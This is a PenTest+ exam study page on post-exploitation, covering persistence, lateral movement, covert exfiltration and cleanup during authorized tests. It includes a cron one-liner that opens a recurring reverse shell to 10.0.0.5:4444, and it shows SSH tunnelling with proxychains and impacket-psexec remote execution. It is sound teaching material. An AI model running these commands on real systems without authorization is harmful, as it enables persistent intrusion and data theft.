Table of Contents

Click Here to Return To the CompTIA PenTest+ Course Page

Post-exploitation and Lateral Movement is 14% of the CompTIA PenTest+ (PT0-003) exam. This module covers what you do after the first foothold: hold access, move deeper, steal data safely, and clean up. The first shell is rarely the goal. The real value is showing how far an attacker can go from one weak point.

You take the access you earned in attacks and exploits and demonstrate real business impact. A single compromised workstation that leads to domain admin and the customer database is a far stronger finding than a list of unpatched servers.

Persistence

Persistence keeps your access alive after a reboot, a logout, or a patch. You demonstrate it so the client understands how an attacker stays in even after the initial hole is closed.

TechniqueHow it persists
Scheduled tasks / cron jobsRe-run your payload on a timer
New accountsA backdoor user you control
Registry keysRun keys that launch on Windows startup
Reverse and bind shellsCall-back or listening shells for re-entry
C2 frameworksCommand-and-control beacons like Sliver or Cobalt Strike
Rootkits and backdoorsDeeply hidden, persistent access

You add a Linux cron job that calls back every five minutes:

(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'") | crontab -

Document every persistence mechanism you create. You remove all of them during cleanup.

Lateral Movement

Lateral movement is how you spread from your first host to the rest of the network. You pivot through a compromised host to reach systems you could not touch directly, dump credentials, and discover new services across SMB, RDP, SSH, LDAP, and RPC.

You tunnel your tools through a compromised host with Proxychains and a dynamic SSH tunnel:

ssh -D 1080 user@10.0.0.5
proxychains nmap -sT -Pn 10.0.1.0/24

You execute commands across Windows hosts with Impacket’s psexec:

impacket-psexec domain/user:password@10.0.1.20
ToolLateral movement use
LOLBinsBuilt-in tools to blend in
CrackMapExecSpray credentials across many hosts
Impacketpsexec, wmiexec, secretsdump
NetcatRelays and simple shells
sshuttleTransparent VPN-like pivoting over SSH
ProxychainsRoute any tool through a proxy or tunnel
MetasploitRouting, pivoting, and post modules
PsExecRemote execution on Windows
MimikatzCredential reuse for pass-the-hash

Staging and Exfiltration

Staging collects the data you want in one place, then exfiltration moves it out without tripping alarms. You demonstrate the data theft an attacker would perform, using file encryption to protect what you move and covert channels to hide it.

Covert channelHow it hides data
DNSEncode data in DNS queries
ICMPSmuggle data inside ping packets
HTTPSBlend exfil traffic into normal web traffic

You also cover steganography, hiding data inside images or files, and cloud storage as a drop point. Only exfiltrate test data or approved files, never real customer records beyond what the rules of engagement allow.

Cleanup and Restoration

A professional leaves the environment as they found it. Cleanup and restoration is an ethical and contractual requirement, not an afterthought.

  • Remove every persistence mechanism you created
  • Revert configuration changes back to the original state
  • Remove tools, payloads, and scripts you uploaded
  • Preserve artifacts and logs needed for the report
  • Perform secure data destruction of any client data you collected

You keep a running log of every change you make so cleanup is complete and verifiable. A leftover backdoor account is a finding against you, and it can become a real attacker’s entry point.

Next Steps

You finished the technical phases. Fold these results into the report you planned in Engagement Management , where the attack narrative ties your foothold, lateral movement, and impact into one story for the client. Review Attacks and Exploits to strengthen your initial access skills, and return to the CompTIA PenTest+ Course to finish the path. Before exam day, read tips for passing CompTIA exams .